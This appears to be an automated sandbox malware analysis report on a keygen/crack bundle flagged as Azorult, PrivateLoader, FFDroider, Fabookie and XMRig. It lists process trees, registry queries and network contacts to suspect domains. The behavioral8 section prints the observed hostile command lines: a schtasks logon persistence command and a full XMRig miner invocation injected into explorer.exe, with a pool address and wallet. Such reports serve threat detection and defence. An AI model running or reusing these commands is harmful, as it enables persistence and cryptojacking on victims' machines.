Malware Analysis Report

2024-11-15 09:03

Sample ID 241110-p9k86axerd
Target 4c269e43d99dbd557bd75b79ddf1ca143d006de9b096936403e75b1178751f66
SHA256 4c269e43d99dbd557bd75b79ddf1ca143d006de9b096936403e75b1178751f66
Tags
loader azorult privateloader discovery infostealer trojan ffdroider spyware stealer fabookie gcleaner onlylogger xmrig miner smokeloader pub1 backdoor evasion
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral5

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral13

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral15

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral8

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral17

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral4

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral7

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral9

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral12

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral16

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral19

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral20

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral3

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral6

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral10

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral11

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral14

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral18

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

4c269e43d99dbd557bd75b79ddf1ca143d006de9b096936403e75b1178751f66

Threat Level: Known bad

The file 4c269e43d99dbd557bd75b79ddf1ca143d006de9b096936403e75b1178751f66 was found to be: Known bad.

Malicious Activity Summary

loader azorult privateloader discovery infostealer trojan ffdroider spyware stealer fabookie gcleaner onlylogger xmrig miner smokeloader pub1 backdoor evasion

Privateloader family

Azorult

Detect Fabookie payload

FFDroider payload

SmokeLoader

OnlyLogger

Fabookie family

Ffdroider family

GCleaner

Onlylogger family

Azorult family

Gcleaner family

xmrig

Xmrig family

Fabookie

Smokeloader family

FFDroider

OnlyLogger payload

XMRig Miner payload

Deletes itself

Checks computer location settings

Reads user/profile data of web browsers

Loads dropped DLL

Executes dropped EXE

Checks whether UAC is enabled

Legitimate hosting services abused for malware hosting/C2

Looks up external IP address via web service

Suspicious use of SetThreadContext

Drops file in Windows directory

Unsigned PE

Enumerates physical storage devices

System Network Configuration Discovery: Internet Connection Discovery

Program crash

System Location Discovery: System Language Discovery

Runs ping.exe

Scheduled Task/Job: Scheduled Task

Modifies system certificate store

Uses Task Scheduler COM API

Suspicious use of AdjustPrivilegeToken

Suspicious behavior: CmdExeWriteProcessMemorySpam

Suspicious use of WriteProcessMemory

Suspicious behavior: EnumeratesProcesses

Checks SCSI registry key(s)

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-11-10 13:01

Signatures

Azorult family

azorult

Privateloader family

privateloader

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-11-10 13:01

Reported

2024-11-10 13:04

Platform

win7-20240903-en

Max time kernel

118s

Max time network

120s

Command Line

"C:\Users\Admin\AppData\Local\Temp\keygen-step-1.exe"

Signatures

Azorult

trojan infostealer azorult

Azorult family

azorult

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\keygen-step-1.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\keygen-step-1.exe

"C:\Users\Admin\AppData\Local\Temp\keygen-step-1.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 kvaka.li udp
US 8.8.8.8:53 kvaka.li udp

Files

memory/2140-0-0x0000000000400000-0x0000000000420000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-11-10 13:01

Reported

2024-11-10 13:04

Platform

win10v2004-20241007-en

Max time kernel

94s

Max time network

150s

Command Line

"C:\Users\Admin\AppData\Local\Temp\keygen-step-1.exe"

Signatures

Azorult

trojan infostealer azorult

Azorult family

azorult

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\keygen-step-1.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\keygen-step-1.exe

"C:\Users\Admin\AppData\Local\Temp\keygen-step-1.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 kvaka.li udp
US 8.8.8.8:53 kvaka.li udp
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 149.220.183.52.in-addr.arpa udp
US 8.8.8.8:53 172.214.232.199.in-addr.arpa udp
US 8.8.8.8:53 22.160.190.20.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 58.55.71.13.in-addr.arpa udp
US 8.8.8.8:53 197.87.175.4.in-addr.arpa udp
US 8.8.8.8:53 241.42.69.40.in-addr.arpa udp
US 8.8.8.8:53 48.229.111.52.in-addr.arpa udp

Files

memory/3252-0-0x0000000000400000-0x0000000000420000-memory.dmp

Analysis: behavioral5

Detonation Overview

Submitted

2024-11-10 13:01

Reported

2024-11-10 13:04

Platform

win7-20240903-en

Max time kernel

57s

Max time network

125s

Command Line

"C:\Users\Admin\AppData\Local\Temp\keygen-step-4\Crack.exe"

Signatures

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\keygen-step-4\Crack.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\keygen-step-4\Crack.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\keygen-step-4\Crack.exe

"C:\Users\Admin\AppData\Local\Temp\keygen-step-4\Crack.exe"

C:\Users\Admin\AppData\Local\Temp\keygen-step-4\Crack.exe

"C:\Users\Admin\AppData\Local\Temp\keygen-step-4\Crack.exe" -a

Network

Country Destination Domain Proto
US 8.8.8.8:53 live.goatgame.live udp

Files

N/A

Analysis: behavioral13

Detonation Overview

Submitted

2024-11-10 13:01

Reported

2024-11-10 13:04

Platform

win7-20240903-en

Max time kernel

120s

Max time network

121s

Command Line

"C:\Users\Admin\AppData\Local\Temp\keygen-step-4\md1_1eaf.exe"

Signatures

FFDroider

stealer ffdroider

FFDroider payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Ffdroider family

ffdroider

Reads user/profile data of web browsers

spyware stealer

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\keygen-step-4\md1_1eaf.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\keygen-step-4\md1_1eaf.exe

"C:\Users\Admin\AppData\Local\Temp\keygen-step-4\md1_1eaf.exe"

Network

Country Destination Domain Proto
RU 186.2.171.3:80 tcp

Files

memory/2068-0-0x0000000000400000-0x0000000000667000-memory.dmp

memory/2068-1-0x0000000000020000-0x0000000000023000-memory.dmp

memory/2068-3-0x0000000000400000-0x0000000000667000-memory.dmp

memory/2068-6-0x0000000000400000-0x0000000000667000-memory.dmp

Analysis: behavioral15

Detonation Overview

Submitted

2024-11-10 13:01

Reported

2024-11-10 13:04

Platform

win7-20240729-en

Max time kernel

16s

Max time network

20s

Command Line

"C:\Users\Admin\AppData\Local\Temp\keygen-step-4\ss.exe"

Signatures

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-4\ss.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\keygen-step-4\ss.exe

"C:\Users\Admin\AppData\Local\Temp\keygen-step-4\ss.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 one-online-gam3s.com udp
US 8.8.8.8:53 oneeuropegroup.xyz udp
US 8.8.8.8:53 gensolutions.bar udp
US 8.8.8.8:53 2no.co udp
US 104.21.79.229:443 2no.co tcp
US 104.21.79.229:443 2no.co tcp

Files

memory/2212-0-0x000007FEF64B3000-0x000007FEF64B4000-memory.dmp

memory/2212-1-0x0000000001070000-0x000000000108E000-memory.dmp

memory/2212-2-0x0000000000350000-0x000000000036A000-memory.dmp

memory/2212-3-0x000007FEF64B0000-0x000007FEF6E9C000-memory.dmp

memory/2212-4-0x000007FEF64B0000-0x000007FEF6E9C000-memory.dmp

Analysis: behavioral8

Detonation Overview

Submitted

2024-11-10 13:01

Reported

2024-11-10 13:04

Platform

win10v2004-20241007-en

Max time kernel

149s

Max time network

149s

Command Line

"C:\Users\Admin\AppData\Local\Temp\keygen-step-4\PBrowFile28.exe"

Signatures

Detect Fabookie payload

Description Indicator Process Target
N/A N/A N/A N/A

Fabookie

spyware stealer fabookie

Fabookie family

fabookie

GCleaner

loader gcleaner

Gcleaner family

gcleaner

OnlyLogger

loader onlylogger

Onlylogger family

onlylogger

Xmrig family

xmrig

xmrig

miner xmrig

OnlyLogger payload

Description Indicator Process Target
N/A N/A N/A N/A

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\keygen-step-4\PBrowFile28.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\chrome3.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Roaming\services64.exe N/A

Reads user/profile data of web browsers

spyware stealer

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A raw.githubusercontent.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A raw.githubusercontent.com N/A N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A ip-api.com N/A N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 4940 set thread context of 5048 N/A C:\Users\Admin\AppData\Roaming\services64.exe C:\Windows\explorer.exe

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\keygen-step-4\PBrowFile28.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\setup.exe N/A

Scheduled Task/Job: Scheduled Task

persistence execution
Description Indicator Process Target
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\chrome3.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\services64.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\2.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser188.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\chrome3.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\services64.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Windows\explorer.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Windows\explorer.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1016 wrote to memory of 4068 N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-4\PBrowFile28.exe C:\Users\Admin\AppData\Local\Temp\chrome3.exe
PID 1016 wrote to memory of 4068 N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-4\PBrowFile28.exe C:\Users\Admin\AppData\Local\Temp\chrome3.exe
PID 1016 wrote to memory of 1696 N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-4\PBrowFile28.exe C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser188.exe
PID 1016 wrote to memory of 1696 N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-4\PBrowFile28.exe C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser188.exe
PID 1016 wrote to memory of 3412 N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-4\PBrowFile28.exe C:\Users\Admin\AppData\Local\Temp\2.exe
PID 1016 wrote to memory of 3412 N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-4\PBrowFile28.exe C:\Users\Admin\AppData\Local\Temp\2.exe
PID 1016 wrote to memory of 2264 N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-4\PBrowFile28.exe C:\Users\Admin\AppData\Local\Temp\setup.exe
PID 1016 wrote to memory of 2264 N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-4\PBrowFile28.exe C:\Users\Admin\AppData\Local\Temp\setup.exe
PID 1016 wrote to memory of 2264 N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-4\PBrowFile28.exe C:\Users\Admin\AppData\Local\Temp\setup.exe
PID 1016 wrote to memory of 2396 N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-4\PBrowFile28.exe C:\Users\Admin\AppData\Local\Temp\jhuuee.exe
PID 1016 wrote to memory of 2396 N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-4\PBrowFile28.exe C:\Users\Admin\AppData\Local\Temp\jhuuee.exe
PID 4068 wrote to memory of 816 N/A C:\Users\Admin\AppData\Local\Temp\chrome3.exe C:\Windows\System32\cmd.exe
PID 4068 wrote to memory of 816 N/A C:\Users\Admin\AppData\Local\Temp\chrome3.exe C:\Windows\System32\cmd.exe
PID 816 wrote to memory of 944 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\schtasks.exe
PID 816 wrote to memory of 944 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\schtasks.exe
PID 4068 wrote to memory of 4940 N/A C:\Users\Admin\AppData\Local\Temp\chrome3.exe C:\Users\Admin\AppData\Roaming\services64.exe
PID 4068 wrote to memory of 4940 N/A C:\Users\Admin\AppData\Local\Temp\chrome3.exe C:\Users\Admin\AppData\Roaming\services64.exe
PID 4940 wrote to memory of 220 N/A C:\Users\Admin\AppData\Roaming\services64.exe C:\Windows\System32\cmd.exe
PID 4940 wrote to memory of 220 N/A C:\Users\Admin\AppData\Roaming\services64.exe C:\Windows\System32\cmd.exe
PID 4940 wrote to memory of 3696 N/A C:\Users\Admin\AppData\Roaming\services64.exe C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
PID 4940 wrote to memory of 3696 N/A C:\Users\Admin\AppData\Roaming\services64.exe C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
PID 220 wrote to memory of 4524 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\schtasks.exe
PID 220 wrote to memory of 4524 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\schtasks.exe
PID 4940 wrote to memory of 5048 N/A C:\Users\Admin\AppData\Roaming\services64.exe C:\Windows\explorer.exe
PID 4940 wrote to memory of 5048 N/A C:\Users\Admin\AppData\Roaming\services64.exe C:\Windows\explorer.exe
PID 4940 wrote to memory of 5048 N/A C:\Users\Admin\AppData\Roaming\services64.exe C:\Windows\explorer.exe
PID 4940 wrote to memory of 5048 N/A C:\Users\Admin\AppData\Roaming\services64.exe C:\Windows\explorer.exe
PID 4940 wrote to memory of 5048 N/A C:\Users\Admin\AppData\Roaming\services64.exe C:\Windows\explorer.exe
PID 4940 wrote to memory of 5048 N/A C:\Users\Admin\AppData\Roaming\services64.exe C:\Windows\explorer.exe
PID 4940 wrote to memory of 5048 N/A C:\Users\Admin\AppData\Roaming\services64.exe C:\Windows\explorer.exe
PID 4940 wrote to memory of 5048 N/A C:\Users\Admin\AppData\Roaming\services64.exe C:\Windows\explorer.exe
PID 4940 wrote to memory of 5048 N/A C:\Users\Admin\AppData\Roaming\services64.exe C:\Windows\explorer.exe
PID 4940 wrote to memory of 5048 N/A C:\Users\Admin\AppData\Roaming\services64.exe C:\Windows\explorer.exe
PID 4940 wrote to memory of 5048 N/A C:\Users\Admin\AppData\Roaming\services64.exe C:\Windows\explorer.exe
PID 4940 wrote to memory of 5048 N/A C:\Users\Admin\AppData\Roaming\services64.exe C:\Windows\explorer.exe
PID 4940 wrote to memory of 5048 N/A C:\Users\Admin\AppData\Roaming\services64.exe C:\Windows\explorer.exe
PID 4940 wrote to memory of 5048 N/A C:\Users\Admin\AppData\Roaming\services64.exe C:\Windows\explorer.exe
PID 4940 wrote to memory of 5048 N/A C:\Users\Admin\AppData\Roaming\services64.exe C:\Windows\explorer.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Users\Admin\AppData\Local\Temp\keygen-step-4\PBrowFile28.exe

"C:\Users\Admin\AppData\Local\Temp\keygen-step-4\PBrowFile28.exe"

C:\Users\Admin\AppData\Local\Temp\chrome3.exe

"C:\Users\Admin\AppData\Local\Temp\chrome3.exe"

C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser188.exe

"C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser188.exe"

C:\Users\Admin\AppData\Local\Temp\2.exe

"C:\Users\Admin\AppData\Local\Temp\2.exe"

C:\Users\Admin\AppData\Local\Temp\setup.exe

"C:\Users\Admin\AppData\Local\Temp\setup.exe"

C:\Users\Admin\AppData\Local\Temp\jhuuee.exe

"C:\Users\Admin\AppData\Local\Temp\jhuuee.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 2264 -ip 2264

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2264 -s 788

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 412 -p 2264 -ip 2264

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2264 -s 824

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 428 -p 2264 -ip 2264

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2264 -s 800

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 496 -p 2264 -ip 2264

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2264 -s 944

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 2264 -ip 2264

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2264 -s 960

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 2264 -ip 2264

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2264 -s 1132

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 508 -p 2264 -ip 2264

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2264 -s 1140

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit

C:\Windows\system32\schtasks.exe

schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'

C:\Users\Admin\AppData\Roaming\services64.exe

"C:\Users\Admin\AppData\Roaming\services64.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit

C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe

"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"

C:\Windows\system32\schtasks.exe

schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'

C:\Windows\explorer.exe

C:\Windows\explorer.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu2.nanopool.org:14433 --user=41o1Bi5waqLgbkV653RD7zSYeXSWRu1wnEDzPgFDFwntSnuRx7g4HbHPqNDGS6BW1bget6yyHyrPbBcVsdR6Ebxd843bMuK.office/password --pass= --cpu-max-threads-hint=30 --cinit-remote-config="v4Qq47ngFyBcSyO2uLKc6BetGR/pnUtRI9a9x7kTNHhD/AzlqVRzHV746NYfGJ5T" --cinit-idle-wait=5 --cinit-idle-cpu=70 --tls --cinit-stealth

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 2264 -ip 2264

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2264 -s 1208

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 58.55.71.13.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 remotenetwork.xyz udp
US 8.8.8.8:53 qwertys.info udp
US 8.8.8.8:53 startupmart.bar udp
US 8.8.8.8:53 best-supply-link.xyz udp
US 8.8.8.8:53 ip-api.com udp
US 8.8.8.8:53 2no.co udp
US 208.95.112.1:80 ip-api.com tcp
US 172.67.149.76:443 2no.co tcp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 172.67.149.76:443 2no.co tcp
US 8.8.8.8:53 1.112.95.208.in-addr.arpa udp
US 8.8.8.8:53 76.149.67.172.in-addr.arpa udp
US 8.8.8.8:53 cleaner-partners.biz udp
US 8.8.8.8:53 134.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
UA 194.145.227.161:80 tcp
US 8.8.8.8:53 149.220.183.52.in-addr.arpa udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 qwertys.info udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 qwertys.info udp
US 8.8.8.8:53 13.86.106.20.in-addr.arpa udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 qwertys.info udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 qwertys.info udp
UA 194.145.227.161:80 tcp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 qwertys.info udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 197.87.175.4.in-addr.arpa udp
US 8.8.8.8:53 241.42.69.40.in-addr.arpa udp
US 8.8.8.8:53 qwertys.info udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 qwertys.info udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 qwertys.info udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
UA 194.145.227.161:80 tcp
US 8.8.8.8:53 qwertys.info udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 qwertys.info udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 qwertys.info udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 83.210.23.2.in-addr.arpa udp
US 8.8.8.8:53 qwertys.info udp
US 8.8.8.8:53 sanctam.net udp
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 raw.githubusercontent.com udp
US 185.199.111.133:443 raw.githubusercontent.com tcp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 xmr-eu2.nanopool.org udp
FR 163.172.171.111:14433 xmr-eu2.nanopool.org tcp
US 8.8.8.8:53 133.111.199.185.in-addr.arpa udp
US 8.8.8.8:53 pastebin.com udp
UA 194.145.227.161:80 tcp
US 104.20.4.235:443 pastebin.com tcp
US 8.8.8.8:53 qwertys.info udp
US 8.8.8.8:53 111.171.172.163.in-addr.arpa udp
US 8.8.8.8:53 235.4.20.104.in-addr.arpa udp
US 8.8.8.8:53 xmr-eu1.nanopool.org udp
FR 163.172.154.142:14433 xmr-eu1.nanopool.org tcp
US 8.8.8.8:53 142.154.172.163.in-addr.arpa udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 qwertys.info udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 qwertys.info udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 qwertys.info udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
UA 194.145.227.161:80 tcp
US 8.8.8.8:53 qwertys.info udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 qwertys.info udp
US 8.8.8.8:53 13.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 qwertys.info udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 qwertys.info udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 qwertys.info udp
UA 194.145.227.161:80 tcp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 qwertys.info udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 qwertys.info udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
